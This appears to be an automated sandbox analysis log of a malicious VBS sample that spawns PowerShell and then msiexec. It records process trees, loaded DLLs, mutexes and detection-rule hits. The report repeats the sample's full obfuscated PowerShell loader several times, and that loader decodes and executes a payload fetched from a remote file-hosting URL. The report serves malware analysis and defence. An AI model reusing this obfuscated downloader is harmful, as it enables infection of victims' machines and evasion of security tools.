                Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "<#Frijsenborg Amateurism Knallertfreren Unplaiting #>;$Uniformsfrakke='tingene';<#Gaffelens Slgtsarv kommunevalgene Catalufas kalkeringens Skibsreders Pyrolysevrk #>;$Soundly=$host.PrivateData;If ($Soundly) {$Realters++;}function Burnets254($Sewings){$Noncataclysmic=$Bronzedren+$Sewings.Length-$Realters;for( $Hulede=5;$Hulede -lt $Noncataclysmic;$Hulede+=6){$Extratropical+=$Sewings[$Hulede];}$Extratropical;}function Iba($Charbroiled){ . ($Beslaglgning) ($Charbroiled);}$Aarendes=Burnets254 'SelvpMKapnioBeg az OpsaiThymylT.anslG anua Prim/Klyng5 Penu.Musta0perin Sch,o(EmbadWGldssiHaulanAns.ndStavnoMa wawTaaresoverf BaptNUbiquT rem Borg 1Uncon0Choko. dlis0Viktu;Nonvo ,spsWNussei aboonDob e6 vine4Un.ro;.erag SkamfxDrill6reuss4Natur;T.ght Hathr DousvCroqu:bouc 1Snapd2Byg.e1Lremi.Krens0Truck)Unort KarmiGOtt,keDezinco ergkStuttoEnera/ Fast2 Tryk0Slutv1N hed0F,dig0En er1Z osp0Mu.kl1Ir tt GuiluFFodgniRaulirAfooteOversfT lukosengexSprin/ Pref1 ille2R.fer1 Shar.Disap0 Inqu ';$Roskilde190=Burnets254 'confeuIntersChunkE SecorAab n-Mist aKalvegdahabeCohobNUnsetTFremt ';$Hyetograph=Burnets254 'AfkrihAdfrdtBugmutSnivepFri as,onst:Subve/Jagtl/ munddUsk,er R iniAm invBorsye onn.SlidsgToupeo Hyp oEnsilgChoralfr dleRecha.Proloc Bryso FiskmAbild/ FootuInorgcRosel?No,paeVocabx S ifpglo toHazierDiurnt ider=Ph lodpjathoBasiswRetennSlavilC,nopoUndgaaBalerdI gro& orfiStv,odSnitm= Lich1SkirpnBaadeqRedecj SagnXUnan M Hid.k CounuNidsty Sade0K,onjHNonsyQAnathzLegitkEurop_camoui,uttrG SepacBerkeo efirA E nsJAfkorbStineDAntisrSkrivbArchlsEstraZkjersjForreA SkrivSkrm x Kl eABunkrb Find ';$Kiasmers=Burnets254 'za fr>Styrt ';$Beslaglgning=Burnets254 'BoersI rdelEPraesXOv rv ';$Skibssidernes='Snarligt';$Rettelsesblad='\Assimileringens.Lan';Iba (Burnets254 ' earj$antihg konnlSkoleoG umpb Lycta Owenl Fnbl:MordaCLogiey .omblMylodiSugiln FraudLoadaeLakserpedeseSort r Bill=Nonsp$ AktieNephrn EkskvUa hn:Prluda Fs,epD,onqp,nobbdP.lsya yclotSammeaDipso+ arch$DatabR VinteElatet L,vetGlanse.yperlUnsucsFortreOveresMaelsbDesealCatalaHerhjdNonin ');Iba (Burnets254 ' lapp$SpinkgTvi llMediaoHe.heb.elesaHema lBeful:App eSIn.alc nurrrBrn pasketcwBetjelpremysak de=Mglin$ FradH U fryR,cureFla rtBursio llesgarve,rpseudaU.ennpSuverhBundv.KukkesP.melpSkulel KnusiSpanktAnari( obbl$FagblK Udebi,ingia F easBrovtmYmeree L ver angrsFrimu) M,cu ');Iba (Burnets254 'T erm[ D,agNSpr,ne ProbtSil c. nyprS Aq.aeSpi sr UnonvCor ciRa lecSubureD.belPN.ntao AlsmiTyrannTechntArranMBiltyaOvermnDobbeaDialogAnk eetricor Pinc] Nonc: .orr:a.kanSabonneTvangcPjas.uphtharMo tgi RrsmtNetvryun.ncPpicadrBarbaoinarctUnveroBrodechovedoUagtsl Per, de sk=Moder Bokma[uds aNRunkeeUnlyrtRe ak.Korr.Satione ubinc SexiuSlappr imbeiU diatArbejyHay.yPTilslrurt ko Tildt estaoUndutcAneu oEledol Per,TAut,syL.ttep Vipsesyned]Sjusk:Lodd.:.nsisT ymbilIkrafsCy,li1Trkni2 Dato ');$Hyetograph=$Scrawls[0];$Brnevold=(Burn
                Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "<#Frijsenborg Amateurism Knallertfreren Unplaiting #>;$Uniformsfrakke='tingene';<#Gaffelens Slgtsarv kommunevalgene Catalufas kalkeringens Skibsreders Pyrolysevrk #>;$Soundly=$host.PrivateData;If ($Soundly) {$Realters++;}function Burnets254($Sewings){$Noncataclysmic=$Bronzedren+$Sewings.Length-$Realters;for( $Hulede=5;$Hulede -lt $Noncataclysmic;$Hulede+=6){$Extratropical+=$Sewings[$Hulede];}$Extratropical;}function Iba($Charbroiled){ . ($Beslaglgning) ($Charbroiled);}$Aarendes=Burnets254 'SelvpMKapnioBeg az OpsaiThymylT.anslG anua Prim/Klyng5 Penu.Musta0perin Sch,o(EmbadWGldssiHaulanAns.ndStavnoMa wawTaaresoverf BaptNUbiquT rem Borg 1Uncon0Choko. dlis0Viktu;Nonvo ,spsWNussei aboonDob e6 vine4Un.ro;.erag SkamfxDrill6reuss4Natur;T.ght Hathr DousvCroqu:bouc 1Snapd2Byg.e1Lremi.Krens0Truck)Unort KarmiGOtt,keDezinco ergkStuttoEnera/ Fast2 Tryk0Slutv1N hed0F,dig0En er1Z osp0Mu.kl1Ir tt GuiluFFodgniRaulirAfooteOversfT lukosengexSprin/ Pref1 ille2R.fer1 Shar.Disap0 Inqu ';$Roskilde190=Burnets254 'confeuIntersChunkE SecorAab n-Mist aKalvegdahabeCohobNUnsetTFremt ';$Hyetograph=Burnets254 'AfkrihAdfrdtBugmutSnivepFri as,onst:Subve/Jagtl/ munddUsk,er R iniAm invBorsye onn.SlidsgToupeo Hyp oEnsilgChoralfr dleRecha.Proloc Bryso FiskmAbild/ FootuInorgcRosel?No,paeVocabx S ifpglo toHazierDiurnt ider=Ph lodpjathoBasiswRetennSlavilC,nopoUndgaaBalerdI gro& orfiStv,odSnitm= Lich1SkirpnBaadeqRedecj SagnXUnan M Hid.k CounuNidsty Sade0K,onjHNonsyQAnathzLegitkEurop_camoui,uttrG SepacBerkeo efirA E nsJAfkorbStineDAntisrSkrivbArchlsEstraZkjersjForreA SkrivSkrm x Kl eABunkrb Find ';$Kiasmers=Burnets254 'za fr>Styrt ';$Beslaglgning=Burnets254 'BoersI rdelEPraesXOv rv ';$Skibssidernes='Snarligt';$Rettelsesblad='\Assimileringens.Lan';Iba (Burnets254 ' earj$antihg konnlSkoleoG umpb Lycta Owenl Fnbl:MordaCLogiey .omblMylodiSugiln FraudLoadaeLakserpedeseSort r Bill=Nonsp$ AktieNephrn EkskvUa hn:Prluda Fs,epD,onqp,nobbdP.lsya yclotSammeaDipso+ arch$DatabR VinteElatet L,vetGlanse.yperlUnsucsFortreOveresMaelsbDesealCatalaHerhjdNonin ');Iba (Burnets254 ' lapp$SpinkgTvi llMediaoHe.heb.elesaHema lBeful:App eSIn.alc nurrrBrn pasketcwBetjelpremysak de=Mglin$ FradH U fryR,cureFla rtBursio llesgarve,rpseudaU.ennpSuverhBundv.KukkesP.melpSkulel KnusiSpanktAnari( obbl$FagblK Udebi,ingia F easBrovtmYmeree L ver angrsFrimu) M,cu ');Iba (Burnets254 'T erm[ D,agNSpr,ne ProbtSil c. nyprS Aq.aeSpi sr UnonvCor ciRa lecSubureD.belPN.ntao AlsmiTyrannTechntArranMBiltyaOvermnDobbeaDialogAnk eetricor Pinc] Nonc: .orr:a.kanSabonneTvangcPjas.uphtharMo tgi RrsmtNetvryun.ncPpicadrBarbaoinarctUnveroBrodechovedoUagtsl Per, de sk=Moder Bokma[uds aNRunkeeUnlyrtRe ak.Korr.Satione ubinc SexiuSlappr imbeiU diatArbejyHay.yPTilslrurt ko Tildt estaoUndutcAneu oEledol Per,TAut,syL.ttep Vipsesyned]Sjusk:Lodd.:.nsisT ymbilIkrafsCy,li1Trkni2 Dato ');$Hyetograph=$Scrawls[0];$Brnevold=(BurnJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 1_2_00007FFD9B9FB2EE1_2_00007FFD9B9FB2EE
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 1_2_00007FFD9B9FC09E1_2_00007FFD9B9FC09E
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 1_2_00007FFD9B9F0D921_2_00007FFD9B9F0D92
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 3_2_04C8F3203_2_04C8F320
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 3_2_04C8FBF03_2_04C8FBF0
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 3_2_04C8EFD83_2_04C8EFD8
                Source: Bnnebgers.vbsInitial sample: Strings found which are bigger than 50
                Source: C:\Windows\System32\wscript.exeProcess created: Commandline size = 6826
                Source: unknownProcess created: Commandline size = 6826
                Source: C:\Windows\System32\wscript.exeProcess created: Commandline size = 6826Jump to behavior
                Source: amsi32_4348.amsi.csv, type: OTHERMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
                Source: Process Memory Space: powershell.exe PID: 6648, type: MEMORYSTRMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
                Source: Process Memory Space: powershell.exe PID: 4348, type: MEMORYSTRMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
                Source: classification engineClassification label: mal100.troj.spyw.expl.evad.winVBS@8/10@2/3
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\Assimileringens.LanJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeMutant created: \Sessions\1\BaseNamedObjects\FDD42EE188E931437F4FBE2C
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMutant created: NULL
                Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6672:120:WilError_03
                Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6944:120:WilError_03
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_5ey4v2zi.ok2.ps1Jump to behavior
                Source: unknownProcess created: C:\Windows\System32\wscript.exe C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Bnnebgers.vbs"
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from win32_process where ProcessId=6648
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from win32_process where ProcessId=4348
                Source: C:\Windows\System32\wscript.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
                Source: C:\Windows\System32\wscript.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                Source: unknownProcess created: C:\Windows\System32\wscript.exe C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Bnnebgers.vbs"
                Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "<#Frijsenborg Amateurism Knallertfreren Unplaiting #>;$Uniformsfrakke='tingene';<#Gaffelens Slgtsarv kommunevalgene Catalufas kalkeringens Skibsreders Pyrolysevrk #>;$Soundly=$host.PrivateData;If ($Soundly) {$Realters++;}function Burnets254($Sewings){$Noncataclysmic=$Bronzedren+$Sewings.Length-$Realters;for( $Hulede=5;$Hulede -lt $Noncataclysmic;$Hulede+=6){$Extratropical+=$Sewings[$Hulede];}$Extratropical;}function Iba($Charbroiled){ . ($Beslaglgning) ($Charbroiled);}$Aarendes=Burnets254 'SelvpMKapnioBeg az OpsaiThymylT.anslG anua Prim/Klyng5 Penu.Musta0perin Sch,o(EmbadWGldssiHaulanAns.ndStavnoMa wawTaaresoverf BaptNUbiquT rem Borg 1Uncon0Choko. dlis0Viktu;Nonvo ,spsWNussei aboonDob e6 vine4Un.ro;.erag SkamfxDrill6reuss4Natur;T.ght Hathr DousvCroqu:bouc 1Snapd2Byg.e1Lremi.Krens0Truck)Unort KarmiGOtt,keDezinco ergkStuttoEnera/ Fast2 Tryk0Slutv1N hed0F,dig0En er1Z osp0Mu.kl1Ir tt GuiluFFodgniRaulirAfooteOversfT lukosengexSprin/ Pref1 ille2R.fer1 Shar.Disap0 Inqu ';$Roskilde190=Burnets254 'confeuIntersChunkE SecorAab n-Mist aKalvegdahabeCohobNUnsetTFremt ';$Hyetograph=Burnets254 'AfkrihAdfrdtBugmutSnivepFri as,onst:Subve/Jagtl/ munddUsk,er R iniAm invBorsye onn.SlidsgToupeo Hyp oEnsilgChoralfr dleRecha.Proloc Bryso FiskmAbild/ FootuInorgcRosel?No,paeVocabx S ifpglo toHazierDiurnt ider=Ph lodpjathoBasiswRetennSlavilC,nopoUndgaaBalerdI gro& orfiStv,odSnitm= Lich1SkirpnBaadeqRedecj SagnXUnan M Hid.k CounuNidsty Sade0K,onjHNonsyQAnathzLegitkEurop_camoui,uttrG SepacBerkeo efirA E nsJAfkorbStineDAntisrSkrivbArchlsEstraZkjersjForreA SkrivSkrm x Kl eABunkrb Find ';$Kiasmers=Burnets254 'za fr>Styrt ';$Beslaglgning=Burnets254 'BoersI rdelEPraesXOv rv ';$Skibssidernes='Snarligt';$Rettelsesblad='\Assimileringens.Lan';Iba (Burnets254 ' earj$antihg konnlSkoleoG umpb Lycta Owenl Fnbl:MordaCLogiey .omblMylodiSugiln FraudLoadaeLakserpedeseSort r Bill=Nonsp$ AktieNephrn EkskvUa hn:Prluda Fs,epD,onqp,nobbdP.lsya yclotSammeaDipso+ arch$DatabR VinteElatet L,vetGlanse.yperlUnsucsFortreOveresMaelsbDesealCatalaHerhjdNonin ');Iba (Burnets254 ' lapp$SpinkgTvi llMediaoHe.heb.elesaHema lBeful:App eSIn.alc nurrrBrn pasketcwBetjelpremysak de=Mglin$ FradH U fryR,cureFla rtBursio llesgarve,rpseudaU.ennpSuverhBundv.KukkesP.melpSkulel KnusiSpanktAnari( obbl$FagblK Udebi,ingia F easBrovtmYmeree L ver angrsFrimu) M,cu ');Iba (Burnets254 'T erm[ D,agNSpr,ne ProbtSil c. nyprS Aq.aeSpi sr UnonvCor ciRa lecSubureD.belPN.ntao AlsmiTyrannTechntArranMBiltyaOvermnDobbeaDialogAnk eetricor Pinc] Nonc: .orr:a.kanSabonneTvangcPjas.uphtharMo tgi RrsmtNetvryun.ncPpicadrBarbaoinarctUnveroBrodechovedoUagtsl Per, de sk=Moder Bokma[uds aNRunkeeUnlyrtRe ak.Korr.Satione ubinc SexiuSlappr imbeiU diatArbejyHay.yPTilslrurt ko Tildt estaoUndutcAneu oEledol Per,TAut,syL.ttep Vipsesyned]Sjusk:Lodd.:.nsisT ymbilIkrafsCy,li1Trkni2 Dato ');$Hyetograph=$Scrawls[0];$Brnevold=(Burn
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Source: unknownProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" "<#Frijsenborg Amateurism Knallertfreren Unplaiting #>;$Uniformsfrakke='tingene';<#Gaffelens Slgtsarv kommunevalgene Catalufas kalkeringens Skibsreders Pyrolysevrk #>;$Soundly=$host.PrivateData;If ($Soundly) {$Realters++;}function Burnets254($Sewings){$Noncataclysmic=$Bronzedren+$Sewings.Length-$Realters;for( $Hulede=5;$Hulede -lt $Noncataclysmic;$Hulede+=6){$Extratropical+=$Sewings[$Hulede];}$Extratropical;}function Iba($Charbroiled){ . ($Beslaglgning) ($Charbroiled);}$Aarendes=Burnets254 'SelvpMKapnioBeg az OpsaiThymylT.anslG anua Prim/Klyng5 Penu.Musta0perin Sch,o(EmbadWGldssiHaulanAns.ndStavnoMa wawTaaresoverf BaptNUbiquT rem Borg 1Uncon0Choko. dlis0Viktu;Nonvo ,spsWNussei aboonDob e6 vine4Un.ro;.erag SkamfxDrill6reuss4Natur;T.ght Hathr DousvCroqu:bouc 1Snapd2Byg.e1Lremi.Krens0Truck)Unort KarmiGOtt,keDezinco ergkStuttoEnera/ Fast2 Tryk0Slutv1N hed0F,dig0En er1Z osp0Mu.kl1Ir tt GuiluFFodgniRaulirAfooteOversfT lukosengexSprin/ Pref1 ille2R.fer1 Shar.Disap0 Inqu ';$Roskilde190=Burnets254 'confeuIntersChunkE SecorAab n-Mist aKalvegdahabeCohobNUnsetTFremt ';$Hyetograph=Burnets254 'AfkrihAdfrdtBugmutSnivepFri as,onst:Subve/Jagtl/ munddUsk,er R iniAm invBorsye onn.SlidsgToupeo Hyp oEnsilgChoralfr dleRecha.Proloc Bryso FiskmAbild/ FootuInorgcRosel?No,paeVocabx S ifpglo toHazierDiurnt ider=Ph lodpjathoBasiswRetennSlavilC,nopoUndgaaBalerdI gro& orfiStv,odSnitm= Lich1SkirpnBaadeqRedecj SagnXUnan M Hid.k CounuNidsty Sade0K,onjHNonsyQAnathzLegitkEurop_camoui,uttrG SepacBerkeo efirA E nsJAfkorbStineDAntisrSkrivbArchlsEstraZkjersjForreA SkrivSkrm x Kl eABunkrb Find ';$Kiasmers=Burnets254 'za fr>Styrt ';$Beslaglgning=Burnets254 'BoersI rdelEPraesXOv rv ';$Skibssidernes='Snarligt';$Rettelsesblad='\Assimileringens.Lan';Iba (Burnets254 ' earj$antihg konnlSkoleoG umpb Lycta Owenl Fnbl:MordaCLogiey .omblMylodiSugiln FraudLoadaeLakserpedeseSort r Bill=Nonsp$ AktieNephrn EkskvUa hn:Prluda Fs,epD,onqp,nobbdP.lsya yclotSammeaDipso+ arch$DatabR VinteElatet L,vetGlanse.yperlUnsucsFortreOveresMaelsbDesealCatalaHerhjdNonin ');Iba (Burnets254 ' lapp$SpinkgTvi llMediaoHe.heb.elesaHema lBeful:App eSIn.alc nurrrBrn pasketcwBetjelpremysak de=Mglin$ FradH U fryR,cureFla rtBursio llesgarve,rpseudaU.ennpSuverhBundv.KukkesP.melpSkulel KnusiSpanktAnari( obbl$FagblK Udebi,ingia F easBrovtmYmeree L ver angrsFrimu) M,cu ');Iba (Burnets254 'T erm[ D,agNSpr,ne ProbtSil c. nyprS Aq.aeSpi sr UnonvCor ciRa lecSubureD.belPN.ntao AlsmiTyrannTechntArranMBiltyaOvermnDobbeaDialogAnk eetricor Pinc] Nonc: .orr:a.kanSabonneTvangcPjas.uphtharMo tgi RrsmtNetvryun.ncPpicadrBarbaoinarctUnveroBrodechovedoUagtsl Per, de sk=Moder Bokma[uds aNRunkeeUnlyrtRe ak.Korr.Satione ubinc SexiuSlappr imbeiU diatArbejyHay.yPTilslrurt ko Tildt estaoUndutcAneu oEledol Per,TAut,syL.ttep Vipsesyned]Sjusk:Lodd.:.nsisT ymbilIkrafsCy,li1Trkni2 Dato ');$Hyetograph=$Scrawls[0];$Brnevold=(Burn
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\syswow64\msiexec.exe"
                Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "<#Frijsenborg Amateurism Knallertfreren Unplaiting #>;$Uniformsfrakke='tingene';<#Gaffelens Slgtsarv kommunevalgene Catalufas kalkeringens Skibsreders Pyrolysevrk #>;$Soundly=$host.PrivateData;If ($Soundly) {$Realters++;}function Burnets254($Sewings){$Noncataclysmic=$Bronzedren+$Sewings.Length-$Realters;for( $Hulede=5;$Hulede -lt $Noncataclysmic;$Hulede+=6){$Extratropical+=$Sewings[$Hulede];}$Extratropical;}function Iba($Charbroiled){ . ($Beslaglgning) ($Charbroiled);}$Aarendes=Burnets254 'SelvpMKapnioBeg az OpsaiThymylT.anslG anua Prim/Klyng5 Penu.Musta0perin Sch,o(EmbadWGldssiHaulanAns.ndStavnoMa wawTaaresoverf BaptNUbiquT rem Borg 1Uncon0Choko. dlis0Viktu;Nonvo ,spsWNussei aboonDob e6 vine4Un.ro;.erag SkamfxDrill6reuss4Natur;T.ght Hathr DousvCroqu:bouc 1Snapd2Byg.e1Lremi.Krens0Truck)Unort KarmiGOtt,keDezinco ergkStuttoEnera/ Fast2 Tryk0Slutv1N hed0F,dig0En er1Z osp0Mu.kl1Ir tt GuiluFFodgniRaulirAfooteOversfT lukosengexSprin/ Pref1 ille2R.fer1 Shar.Disap0 Inqu ';$Roskilde190=Burnets254 'confeuIntersChunkE SecorAab n-Mist aKalvegdahabeCohobNUnsetTFremt ';$Hyetograph=Burnets254 'AfkrihAdfrdtBugmutSnivepFri as,onst:Subve/Jagtl/ munddUsk,er R iniAm invBorsye onn.SlidsgToupeo Hyp oEnsilgChoralfr dleRecha.Proloc Bryso FiskmAbild/ FootuInorgcRosel?No,paeVocabx S ifpglo toHazierDiurnt ider=Ph lodpjathoBasiswRetennSlavilC,nopoUndgaaBalerdI gro& orfiStv,odSnitm= Lich1SkirpnBaadeqRedecj SagnXUnan M Hid.k CounuNidsty Sade0K,onjHNonsyQAnathzLegitkEurop_camoui,uttrG SepacBerkeo efirA E nsJAfkorbStineDAntisrSkrivbArchlsEstraZkjersjForreA SkrivSkrm x Kl eABunkrb Find ';$Kiasmers=Burnets254 'za fr>Styrt ';$Beslaglgning=Burnets254 'BoersI rdelEPraesXOv rv ';$Skibssidernes='Snarligt';$Rettelsesblad='\Assimileringens.Lan';Iba (Burnets254 ' earj$antihg konnlSkoleoG umpb Lycta Owenl Fnbl:MordaCLogiey .omblMylodiSugiln FraudLoadaeLakserpedeseSort r Bill=Nonsp$ AktieNephrn EkskvUa hn:Prluda Fs,epD,onqp,nobbdP.lsya yclotSammeaDipso+ arch$DatabR VinteElatet L,vetGlanse.yperlUnsucsFortreOveresMaelsbDesealCatalaHerhjdNonin ');Iba (Burnets254 ' lapp$SpinkgTvi llMediaoHe.heb.elesaHema lBeful:App eSIn.alc nurrrBrn pasketcwBetjelpremysak de=Mglin$ FradH U fryR,cureFla rtBursio llesgarve,rpseudaU.ennpSuverhBundv.KukkesP.melpSkulel KnusiSpanktAnari( obbl$FagblK Udebi,ingia F easBrovtmYmeree L ver angrsFrimu) M,cu ');Iba (Burnets254 'T erm[ D,agNSpr,ne ProbtSil c. nyprS Aq.aeSpi sr UnonvCor ciRa lecSubureD.belPN.ntao AlsmiTyrannTechntArranMBiltyaOvermnDobbeaDialogAnk eetricor Pinc] Nonc: .orr:a.kanSabonneTvangcPjas.uphtharMo tgi RrsmtNetvryun.ncPpicadrBarbaoinarctUnveroBrodechovedoUagtsl Per, de sk=Moder Bokma[uds aNRunkeeUnlyrtRe ak.Korr.Satione ubinc SexiuSlappr imbeiU diatArbejyHay.yPTilslrurt ko Tildt estaoUndutcAneu oEledol Per,TAut,syL.ttep Vipsesyned]Sjusk:Lodd.:.nsisT ymbilIkrafsCy,li1Trkni2 Dato ');$Hyetograph=$Scrawls[0];$Brnevold=(BurnJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\syswow64\msiexec.exe"Jump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: version.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: uxtheme.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: sxs.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: vbscript.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: userenv.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: profapi.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: msasn1.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: cryptsp.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: rsaenh.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: cryptbase.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: msisip.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: wshext.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: scrobj.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: mpr.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: scrrun.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: propsys.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: edputil.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: urlmon.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: iertutil.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: srvcli.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: netutils.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: wintypes.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: appresolver.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: bcp47langs.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: slc.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: sppc.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasapi32.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasman.dllJump to behavior
